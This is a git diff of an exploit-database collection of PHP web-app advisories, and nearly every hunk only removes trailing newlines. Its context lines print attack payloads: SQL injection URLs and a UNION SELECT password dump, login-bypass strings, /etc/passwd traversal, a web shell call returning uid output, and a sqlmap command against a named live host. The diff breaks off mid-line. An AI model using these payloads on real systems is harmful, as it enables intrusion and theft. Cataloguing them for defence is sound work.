--- a/platforms/php/webapps/41730.txt +++ b/platforms/php/webapps/41730.txt @@ -16,4 +16,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/add_booking_shipment_first_step/1/1/1/1[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41731.txt b/platforms/php/webapps/41731.txt index ef86973fe..cdbc9c50f 100755 --- a/platforms/php/webapps/41731.txt +++ b/platforms/php/webapps/41731.txt @@ -16,4 +16,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/show_page/[PAGE][SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41733.txt b/platforms/php/webapps/41733.txt index d6e0528ec..050a2d745 100755 --- a/platforms/php/webapps/41733.txt +++ b/platforms/php/webapps/41733.txt @@ -17,4 +17,4 @@ # http://localhost/[PATH]/package/category/1[SQL] # http://localhost/[PATH]/package_detail/1[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41735.txt b/platforms/php/webapps/41735.txt index 899348286..1311c0be9 100755 --- a/platforms/php/webapps/41735.txt +++ b/platforms/php/webapps/41735.txt @@ -15,4 +15,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4174.txt b/platforms/php/webapps/4174.txt index 3d7efacbc..979bab67f 100755 --- a/platforms/php/webapps/4174.txt +++ b/platforms/php/webapps/4174.txt @@ -28,4 +28,4 @@ # greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :* -# milw0rm.com [2007-07-12] +# milw0rm.com [2007-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/41774.py b/platforms/php/webapps/41774.py index f99e7c349..c835da787 100755 --- a/platforms/php/webapps/41774.py +++ b/platforms/php/webapps/41774.py @@ -80,4 +80,4 @@ print "user_id: %d;" % 1 print "user_limitation: %d;" % 0 print "group_id: %d;" % 1 -# Root privileges can be gained using snmpd once authenticated +# Root privileges can be gained using snmpd once authenticated \ No newline at end of file diff --git a/platforms/php/webapps/41780.txt b/platforms/php/webapps/41780.txt index 13ca426d0..057999878 100755 --- a/platforms/php/webapps/41780.txt +++ b/platforms/php/webapps/41780.txt @@ -21,4 +21,4 @@ # members:last_name # members:email # members:password -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41784.txt b/platforms/php/webapps/41784.txt index de40ac858..b9e418d30 100755 --- a/platforms/php/webapps/41784.txt +++ b/platforms/php/webapps/41784.txt @@ -104,5 +104,4 @@ IV. Thanks to: - Alloh SWT - MyBoboboy - @rungga_reksya, @dvnrcy, @dickysofficial -- Komunitas IT Auditor & IT Security Kaskus - +- Komunitas IT Auditor & IT Security Kaskus \ No newline at end of file diff --git a/platforms/php/webapps/41787.txt b/platforms/php/webapps/41787.txt index 3c4268b47..7b6f3bfbe 100755 --- a/platforms/php/webapps/41787.txt +++ b/platforms/php/webapps/41787.txt @@ -23,4 +23,4 @@ # mu_members:username # mu_members:email # mu_members:accpass -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41788.txt b/platforms/php/webapps/41788.txt index dc6447a1f..01472f93a 100755 --- a/platforms/php/webapps/41788.txt +++ b/platforms/php/webapps/41788.txt @@ -15,4 +15,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?cmd=surveys&survey=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4179.php b/platforms/php/webapps/4179.php index 7fd3591e1..5abf43493 100755 --- a/platforms/php/webapps/4179.php +++ b/platforms/php/webapps/4179.php @@ -497,4 +497,4 @@ function help ($prog) ?> -# milw0rm.com [2007-07-12] +# milw0rm.com [2007-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/4180.txt b/platforms/php/webapps/4180.txt index 4e9ec28b8..7dbb2db1e 100755 --- a/platforms/php/webapps/4180.txt +++ b/platforms/php/webapps/4180.txt @@ -28,4 +28,4 @@ #, Bernard, and everyone else at g00ns.net ############################################################################################### -# milw0rm.com [2007-07-14] +# milw0rm.com [2007-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/41818.txt b/platforms/php/webapps/41818.txt index 3cce81745..91adfb800 100755 --- a/platforms/php/webapps/41818.txt +++ b/platforms/php/webapps/41818.txt @@ -26,4 +26,4 @@ # affiliate_transaction :amount # affiliate_transaction :commission # affiliate_transaction :bid_pack_title -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4182.txt b/platforms/php/webapps/4182.txt index 9391e3aaf..9b4041dbc 100755 --- a/platforms/php/webapps/4182.txt +++ b/platforms/php/webapps/4182.txt @@ -28,4 +28,4 @@ #, Bernard, and everyone else at g00ns.net ############################################################################################### -# milw0rm.com [2007-07-14] +# milw0rm.com [2007-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/41822.txt b/platforms/php/webapps/41822.txt index e381ad272..34b762593 100755 --- a/platforms/php/webapps/41822.txt +++ b/platforms/php/webapps/41822.txt @@ -11,5 +11,4 @@ # CVE : none /php/download.php?id=foo/.&ext=/../../../../../../../etc/passwd -/php/download.php?id=foo/.&ext=/../../../../../../../WINDOWS/system32/drivers/etc/hosts - +/php/download.php?id=foo/.&ext=/../../../../../../../WINDOWS/system32/drivers/etc/hosts \ No newline at end of file diff --git a/platforms/php/webapps/41824.txt b/platforms/php/webapps/41824.txt index 9a5105b1d..174ff43c1 100755 --- a/platforms/php/webapps/41824.txt +++ b/platforms/php/webapps/41824.txt @@ -209,5 +209,4 @@ IV. Thanks to: Refer: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)http://rungga.blogspot.co.id/2017/04/multiple-csrf-remote-code-execution.html -https://github.com/albandes/helpdezk/issues/2 - +https://github.com/albandes/helpdezk/issues/2 \ No newline at end of file diff --git a/platforms/php/webapps/41828.php b/platforms/php/webapps/41828.php index 5a6ad0575..4be3c55c2 100755 --- a/platforms/php/webapps/41828.php +++ b/platforms/php/webapps/41828.php @@ -131,4 +131,4 @@ httpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession); 3. Solution: -Upgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19 +Upgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19 \ No newline at end of file diff --git a/platforms/php/webapps/4183.txt b/platforms/php/webapps/4183.txt index adada4671..31d1ce4d1 100755 --- a/platforms/php/webapps/4183.txt +++ b/platforms/php/webapps/4183.txt @@ -26,4 +26,4 @@ [~]--------------------------------------------------------------------------------------------------------------- [~] Google Dork: © 2005-2006 Powered by eSyndiCat Directory Software -# milw0rm.com [2007-07-14] +# milw0rm.com [2007-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/41832.txt b/platforms/php/webapps/41832.txt index a8fd678ba..76bff53ab 100755 --- a/platforms/php/webapps/41832.txt +++ b/platforms/php/webapps/41832.txt @@ -16,5 +16,4 @@ # SQL Injection/Exploit : # Login as regular user # http://localhost/[PATH]/Share_add.php?hash=[SQL] -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41833.txt b/platforms/php/webapps/41833.txt index 759b3b21b..b152812da 100755 --- a/platforms/php/webapps/41833.txt +++ b/platforms/php/webapps/41833.txt @@ -15,4 +15,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/client/shopinventory_list.php?item=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41834.txt b/platforms/php/webapps/41834.txt index 7ecffa371..67039959a 100755 --- a/platforms/php/webapps/41834.txt +++ b/platforms/php/webapps/41834.txt @@ -15,4 +15,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/caldaily_view.php?editid1=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41838.txt b/platforms/php/webapps/41838.txt index 29fb59b9a..e5d1bae4c 100755 --- a/platforms/php/webapps/41838.txt +++ b/platforms/php/webapps/41838.txt @@ -24,4 +24,4 @@ # teammembers # teammembersinv # teams -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41839.txt b/platforms/php/webapps/41839.txt index 10df5b6a5..2ad810f0c 100755 --- a/platforms/php/webapps/41839.txt +++ b/platforms/php/webapps/41839.txt @@ -22,4 +22,4 @@ # staff :title # staff :access # staff :contact -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4184.txt b/platforms/php/webapps/4184.txt index aa9105cfd..1b050da39 100755 --- a/platforms/php/webapps/4184.txt +++ b/platforms/php/webapps/4184.txt @@ -30,4 +30,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ Realtor 747 SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-14] +# milw0rm.com [2007-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/41849.txt b/platforms/php/webapps/41849.txt index 03baa9192..e7fc7de80 100755 --- a/platforms/php/webapps/41849.txt +++ b/platforms/php/webapps/41849.txt @@ -16,5 +16,4 @@ Turk Siber Yildizlari.! --------------- HTTP://Path/soft4u/ user : ' or '2=2 password : ' or '2=2 ---------------- - +--------------- \ No newline at end of file diff --git a/platforms/php/webapps/4185.txt b/platforms/php/webapps/4185.txt index 053d53f2b..6d809dea1 100755 --- a/platforms/php/webapps/4185.txt +++ b/platforms/php/webapps/4185.txt @@ -29,4 +29,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ Prozilla Directory Script SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-14] +# milw0rm.com [2007-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/41858.txt b/platforms/php/webapps/41858.txt index a1004d25a..7aecb07b1 100755 --- a/platforms/php/webapps/41858.txt +++ b/platforms/php/webapps/41858.txt @@ -20,4 +20,4 @@ # phponly_link_admin:id # phponly_link_admin:username # phponly_link_admin:password -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41859.txt b/platforms/php/webapps/41859.txt index b975f02f0..c1f454167 100755 --- a/platforms/php/webapps/41859.txt +++ b/platforms/php/webapps/41859.txt @@ -15,4 +15,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/home/categorySearch?category_id=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4186.txt b/platforms/php/webapps/4186.txt index 4a55b9aa9..5e822afa1 100755 --- a/platforms/php/webapps/4186.txt +++ b/platforms/php/webapps/4186.txt @@ -18,4 +18,4 @@ FROM (pafiledb_users"| netcat $host 80 Vendor: was informed, but did not response yet... credits: h4si & pUm -# milw0rm.com [2007-07-14] +# milw0rm.com [2007-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/4187.txt b/platforms/php/webapps/4187.txt index f24c70aad..0eaa765c5 100755 --- a/platforms/php/webapps/4187.txt +++ b/platforms/php/webapps/4187.txt @@ -29,4 +29,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org ! --==+ Traffic Stats SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-16] +# milw0rm.com [2007-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/41876.txt b/platforms/php/webapps/41876.txt index e5dae20e2..11d9ecc02 100755 --- a/platforms/php/webapps/41876.txt +++ b/platforms/php/webapps/41876.txt @@ -87,4 +87,4 @@ sufficient rights to use this feature however. /cpg15x/showthumb.php?picfile=../../../../../../etc/non-existantfile -- Hacker Fantastic - (http://www.myhackerhouse.com) + (http://www.myhackerhouse.com) \ No newline at end of file diff --git a/platforms/php/webapps/41884.rb b/platforms/php/webapps/41884.rb index bf5ac0c19..5bd5de570 100755 --- a/platforms/php/webapps/41884.rb +++ b/platforms/php/webapps/41884.rb @@ -88,4 +88,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/4189.txt b/platforms/php/webapps/4189.txt index 5e4d8fdfb..24efb03ec 100755 --- a/platforms/php/webapps/4189.txt +++ b/platforms/php/webapps/4189.txt @@ -27,4 +27,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org ! --==+ Expert Advisior SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-17] +# milw0rm.com [2007-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/4191.txt b/platforms/php/webapps/4191.txt index d5f158350..dc942fca0 100755 --- a/platforms/php/webapps/4191.txt +++ b/platforms/php/webapps/4191.txt @@ -30,4 +30,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org ! --==+ Pictures Rating SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-18] +# milw0rm.com [2007-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/41918.txt b/platforms/php/webapps/41918.txt index 7f0babb1f..7d3a3494b 100755 --- a/platforms/php/webapps/41918.txt +++ b/platforms/php/webapps/41918.txt @@ -55,4 +55,4 @@ This will create a new admin account, hacker:12345678 POC video : *https://www.youtube.com/watch?v=eCf9a0QpnPs -Patch : No patch yet +Patch : No patch yet \ No newline at end of file diff --git a/platforms/php/webapps/41919.txt b/platforms/php/webapps/41919.txt index ddc76a6cd..0e8b0e22e 100755 --- a/platforms/php/webapps/41919.txt +++ b/platforms/php/webapps/41919.txt @@ -60,4 +60,4 @@ Critical 06-Mar-2017 - informed the developer 20-Mar-2017 - release date of this security advisory -Not fixed at the date of submitting this exploit. +Not fixed at the date of submitting this exploit. \ No newline at end of file diff --git a/platforms/php/webapps/4192.htm b/platforms/php/webapps/4192.htm index f074c26e9..23bc49536 100755 --- a/platforms/php/webapps/4192.htm +++ b/platforms/php/webapps/4192.htm @@ -293,4 +293,4 @@ return false; -# milw0rm.com [2007-07-18] +# milw0rm.com [2007-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/4193.txt b/platforms/php/webapps/4193.txt index 8a7ab01e5..6952086cc 100755 --- a/platforms/php/webapps/4193.txt +++ b/platforms/php/webapps/4193.txt @@ -17,4 +17,4 @@ link admin:http://www.xxx.com/admin/ demo(main site :D :D): http://www.quickestore.com/ppec/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20params%22having%201=1 -# milw0rm.com [2007-07-18] +# milw0rm.com [2007-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/41936.txt b/platforms/php/webapps/41936.txt index 51f39c7ac..054247ca9 100755 --- a/platforms/php/webapps/41936.txt +++ b/platforms/php/webapps/41936.txt @@ -400,5 +400,4 @@ Timeline --- Anti Anti Räis Blog: https://bitflipper.eu -Pentester at http://www.clarifiedsecurity.com - +Pentester at http://www.clarifiedsecurity.com \ No newline at end of file diff --git a/platforms/php/webapps/41939.txt b/platforms/php/webapps/41939.txt index 6f62b39cc..207e1508e 100755 --- a/platforms/php/webapps/41939.txt +++ b/platforms/php/webapps/41939.txt @@ -60,4 +60,4 @@ POC video : https://www.youtube.com/watch?v=wFuN-ADlJpM Patch : No patch yet ---------------------------------------------------------------- +--------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/4194.txt b/platforms/php/webapps/4194.txt index 7e45ae55f..5f7ca251d 100755 --- a/platforms/php/webapps/4194.txt +++ b/platforms/php/webapps/4194.txt @@ -41,4 +41,4 @@ HH HH HH HH HHHHH HH HH HH HHHHHHHH HH HH HHHHH HH HH HH HH HH HH HHHHHH HH HH HH HHHHHHHH HH HH HHHHHH HH HH -# milw0rm.com [2007-07-18] +# milw0rm.com [2007-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/41943.py b/platforms/php/webapps/41943.py index 06e2e2f82..d44ecc1c2 100755 --- a/platforms/php/webapps/41943.py +++ b/platforms/php/webapps/41943.py @@ -96,5 +96,4 @@ while option != 0: elif option == "info": about() else: - print "Not a valid option! Need help? Press ? to display core commands " +GREEN - + print "Not a valid option! Need help? Press ? to display core commands " +GREEN \ No newline at end of file diff --git a/platforms/php/webapps/41944.txt b/platforms/php/webapps/41944.txt index 63fb305f7..f78013dd0 100755 --- a/platforms/php/webapps/41944.txt +++ b/platforms/php/webapps/41944.txt @@ -10,4 +10,4 @@ POC Drop file php (shell.php) to upload. -access to http://poc_site/fileFolder/shell.php and enjoy! +access to http://poc_site/fileFolder/shell.php and enjoy! \ No newline at end of file diff --git a/platforms/php/webapps/4195.txt b/platforms/php/webapps/4195.txt index 6d268c959..614d64267 100755 --- a/platforms/php/webapps/4195.txt +++ b/platforms/php/webapps/4195.txt @@ -8,4 +8,4 @@ Greetz:d3hydr8,whoami mozi2weed@yahoo.com magenkyo.sharingan@yahoo.com -# milw0rm.com [2007-07-18] +# milw0rm.com [2007-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/4197.txt b/platforms/php/webapps/4197.txt index 221c3db54..c817e952c 100755 --- a/platforms/php/webapps/4197.txt +++ b/platforms/php/webapps/4197.txt @@ -32,4 +32,4 @@ $phpbb_root_path is not declared before require ####The 18 years old german Hacker bd0rk#### -# milw0rm.com [2007-07-18] +# milw0rm.com [2007-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/41979.txt b/platforms/php/webapps/41979.txt index d3dee1862..acc4fcc6c 100755 --- a/platforms/php/webapps/41979.txt +++ b/platforms/php/webapps/41979.txt @@ -164,4 +164,4 @@ Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \ No newline at end of file diff --git a/platforms/php/webapps/41989.txt b/platforms/php/webapps/41989.txt index f8257b56d..97de983ba 100755 --- a/platforms/php/webapps/41989.txt +++ b/platforms/php/webapps/41989.txt @@ -47,5 +47,4 @@ type=mainsettings&iframe=on&utf8=on&footer=aaaaaa'%3B%24hacker%3Dhwul%2F%2Finjec $settings['password'] = 'asdf'; // ACP Password (Keep it strong) $settings['footer'] = 'aaaaaa';$hacker=hwul//inject_php_code'; $settings['admin_link'] = true; // Show the admin link in the footer of all page -$settings['bm_info'] = true; // Show ban management infomation aside 'Account Status' - +$settings['bm_info'] = true; // Show ban management infomation aside 'Account Status' \ No newline at end of file diff --git a/platforms/php/webapps/4199.txt b/platforms/php/webapps/4199.txt index 28d43cc87..347b4df8b 100755 --- a/platforms/php/webapps/4199.txt +++ b/platforms/php/webapps/4199.txt @@ -12,4 +12,4 @@ http://www.site.com/[mdpro_path]/index.php?module=Topics&func=view&topicid=-1 UN Default prefix is "md_" change it if needed -# milw0rm.com [2007-07-18] +# milw0rm.com [2007-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/41990.html b/platforms/php/webapps/41990.html index a36115c27..b27392b63 100755 --- a/platforms/php/webapps/41990.html +++ b/platforms/php/webapps/41990.html @@ -61,6 +61,4 @@ - - +--> \ No newline at end of file diff --git a/platforms/php/webapps/42005.txt b/platforms/php/webapps/42005.txt index 03cb206b9..65b8fef1d 100755 --- a/platforms/php/webapps/42005.txt +++ b/platforms/php/webapps/42005.txt @@ -69,6 +69,4 @@ action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/me https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) Thanks -Faiz Ahmed Zaidi - - +Faiz Ahmed Zaidi \ No newline at end of file diff --git a/platforms/php/webapps/4201.txt b/platforms/php/webapps/4201.txt index 09c2eac44..aa0675cf3 100755 --- a/platforms/php/webapps/4201.txt +++ b/platforms/php/webapps/4201.txt @@ -31,4 +31,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-07-19] +# milw0rm.com [2007-07-19] \ No newline at end of file diff --git a/platforms/php/webapps/42012.txt b/platforms/php/webapps/42012.txt index b198d5264..c55c09cb2 100755 --- a/platforms/php/webapps/42012.txt +++ b/platforms/php/webapps/42012.txt @@ -68,4 +68,4 @@ Proof-of-Concept: 03/03/2017: Vendor confirms that the fix is ready and is in the process of testing. 09/03/2017: Vendor confirmed that the patch will be released on March 17 2017 and requested to hold off publishing the CVE until March 31 2017. 17/03/2017: Vendor released the patch: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html -31/03/2017: Published CVE as agreed by vendor +31/03/2017: Published CVE as agreed by vendor \ No newline at end of file diff --git a/platforms/php/webapps/42033.txt b/platforms/php/webapps/42033.txt index be123847e..b268d1fea 100755 --- a/platforms/php/webapps/42033.txt +++ b/platforms/php/webapps/42033.txt @@ -27,4 +27,4 @@ Parameter: list[fullordering] (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) - Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu) + Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu) \ No newline at end of file diff --git a/platforms/php/webapps/42038.txt b/platforms/php/webapps/42038.txt index d661cbfb8..1f8a4a2f3 100755 --- a/platforms/php/webapps/42038.txt +++ b/platforms/php/webapps/42038.txt @@ -81,5 +81,4 @@ Visible on this page: report_online.html |_|\___/ \__,_|_| |_|_|\__,_| Touhid SHaikh -An Independent Security Researcher. - +An Independent Security Researcher. \ No newline at end of file diff --git a/platforms/php/webapps/42042.txt b/platforms/php/webapps/42042.txt index 69807c2a6..d7ac0f4cb 100755 --- a/platforms/php/webapps/42042.txt +++ b/platforms/php/webapps/42042.txt @@ -23,5 +23,4 @@ HREF="javascript:alert('OPENBUGBOUNTY')">Click_ME<' 3) References: https://www.openbugbounty.org/incidents/228262/ -https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle - +https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle \ No newline at end of file diff --git a/platforms/php/webapps/4206.txt b/platforms/php/webapps/4206.txt index fc6891d3a..b82ef2a86 100755 --- a/platforms/php/webapps/4206.txt +++ b/platforms/php/webapps/4206.txt @@ -28,4 +28,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org ! --==+ BlogSite Professional SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-20] +# milw0rm.com [2007-07-20] \ No newline at end of file diff --git a/platforms/php/webapps/4209.txt b/platforms/php/webapps/4209.txt index 074c64ade..3dd2875b3 100755 --- a/platforms/php/webapps/4209.txt +++ b/platforms/php/webapps/4209.txt @@ -31,4 +31,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ WSN Links Basic Edition SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-21] +# milw0rm.com [2007-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/42095.txt b/platforms/php/webapps/42095.txt index 820c0f24b..140019f95 100755 --- a/platforms/php/webapps/42095.txt +++ b/platforms/php/webapps/42095.txt @@ -114,5 +114,4 @@ Possibly exploitable for code execution using the PHP LFI to RCE method by Gynva extended by Brett Moore: - http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf - - https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf - + - https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf \ No newline at end of file diff --git a/platforms/php/webapps/42096.txt b/platforms/php/webapps/42096.txt index bb246565f..845053bdb 100755 --- a/platforms/php/webapps/42096.txt +++ b/platforms/php/webapps/42096.txt @@ -162,4 +162,4 @@ GET http://127.0.0.1/media/customers/5575/shell.php.jpg?cmd=id HTTP/1.1 uid=48(apache) gid=48(apache) groups=48(apache) ---> +--> \ No newline at end of file diff --git a/platforms/php/webapps/42097.txt b/platforms/php/webapps/42097.txt index a842b9994..610d485e5 100755 --- a/platforms/php/webapps/42097.txt +++ b/platforms/php/webapps/42097.txt @@ -376,5 +376,4 @@ PoC SQL Injection via GET requests: GET /ov3.php?todo=manager&manager=task&sub=show&rs[status]=2&rs[module]='&rs[path]=&rs[changed]=0&&sid=ba2211a30f4d1b395ca5c987eda4TEST&stamp=1234567890&lang=en HTTP/1.1 -GET /ov3.php?todo=manager&manager=user&sub=profile&do=show&rs[edit_id]=1483825'&rs[home]=1&sid=ba2211a30f4d1b395ca5c987eda4TEST&stamp=1234567890&lang=en HTTP/1.1 - +GET /ov3.php?todo=manager&manager=user&sub=profile&do=show&rs[edit_id]=1483825'&rs[home]=1&sid=ba2211a30f4d1b395ca5c987eda4TEST&stamp=1234567890&lang=en HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/42098.txt b/platforms/php/webapps/42098.txt index 4b765680b..60788d4ec 100755 --- a/platforms/php/webapps/42098.txt +++ b/platforms/php/webapps/42098.txt @@ -93,5 +93,4 @@ function facetag_changeTag($params, &$service) { return json_encode($answer); } ---------------------------END HERE--------------------------- - +--------------------------END HERE--------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/4210.txt b/platforms/php/webapps/4210.txt index 455ad908d..4e4e9f399 100755 --- a/platforms/php/webapps/4210.txt +++ b/platforms/php/webapps/4210.txt @@ -21,4 +21,4 @@ http://private-node.net ############################## ****************************************** -# milw0rm.com [2007-07-21] +# milw0rm.com [2007-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/4211.htm b/platforms/php/webapps/4211.htm index 2754f2397..e04807dbf 100755 --- a/platforms/php/webapps/4211.htm +++ b/platforms/php/webapps/4211.htm @@ -127,4 +127,4 @@ ID...............> -# milw0rm.com [2007-07-21] +# milw0rm.com [2007-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/42113.txt b/platforms/php/webapps/42113.txt index 9aba5084f..5e83bcc26 100755 --- a/platforms/php/webapps/42113.txt +++ b/platforms/php/webapps/42113.txt @@ -24,4 +24,4 @@ Parameter: aid (GET) http://server/index.php?option=com_payage&task=make_payment&aid=[SQL]&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid= # Greetz : T3NZOG4N & FireKernel -# Iranian White Hat Hackers +# Iranian White Hat Hackers \ No newline at end of file diff --git a/platforms/php/webapps/4212.txt b/platforms/php/webapps/4212.txt index 42bdb8980..c8188be30 100755 --- a/platforms/php/webapps/4212.txt +++ b/platforms/php/webapps/4212.txt @@ -104,4 +104,4 @@ Patch/Workaround: Use the fix from SVN (check out at least revision 7456 of /development/trunk/components/com_search/views/search/view.php) -# milw0rm.com [2007-07-22] +# milw0rm.com [2007-07-22] \ No newline at end of file diff --git a/platforms/php/webapps/4213.txt b/platforms/php/webapps/4213.txt index dbc3fac12..6668f1e41 100755 --- a/platforms/php/webapps/4213.txt +++ b/platforms/php/webapps/4213.txt @@ -31,4 +31,4 @@ #, Bernard and everyone else at g00ns.net ############################################################################################### -# milw0rm.com [2007-07-22] +# milw0rm.com [2007-07-22] \ No newline at end of file diff --git a/platforms/php/webapps/42132.txt b/platforms/php/webapps/42132.txt index f964d2844..ce2ff4137 100755 --- a/platforms/php/webapps/42132.txt +++ b/platforms/php/webapps/42132.txt @@ -229,6 +229,4 @@ of vulnerability-lab team & the specific authors or managers. To record, list, m -- VULNERABILITY LABORATORY - RESEARCH TEAM -SERVICE: www.vulnerability-lab.com - - +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/42133.txt b/platforms/php/webapps/42133.txt index b41413440..2ec2a3e62 100755 --- a/platforms/php/webapps/42133.txt +++ b/platforms/php/webapps/42133.txt @@ -193,4 +193,4 @@ script vuln : plans_actions.php #### Special Thanks to SC, PC and Mana l'artiste from HTTPCS - Ziwit SecTeam #### ------------------------------------------------------------------------------------------------------------------------------- +------------------------------------------------------------------------------------------------------------------------------ \ No newline at end of file diff --git a/platforms/php/webapps/42151.txt b/platforms/php/webapps/42151.txt index 57d6996e0..f4829848d 100755 --- a/platforms/php/webapps/42151.txt +++ b/platforms/php/webapps/42151.txt @@ -23,6 +23,4 @@ PDO->query('SELECT * FROM 3...') thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php on line 16 -$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs - - +$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs \ No newline at end of file diff --git a/platforms/php/webapps/42166.txt b/platforms/php/webapps/42166.txt index 2de02fa58..bed5b3a8f 100755 --- a/platforms/php/webapps/42166.txt +++ b/platforms/php/webapps/42166.txt @@ -39,5 +39,4 @@ for a hotfix. http://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-inje ction-sqli/ -http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418 - +http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418 \ No newline at end of file diff --git a/platforms/php/webapps/42172.txt b/platforms/php/webapps/42172.txt index 137abbfad..67ca3d1bd 100755 --- a/platforms/php/webapps/42172.txt +++ b/platforms/php/webapps/42172.txt @@ -46,5 +46,4 @@ http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603 - - + \ No newline at end of file diff --git 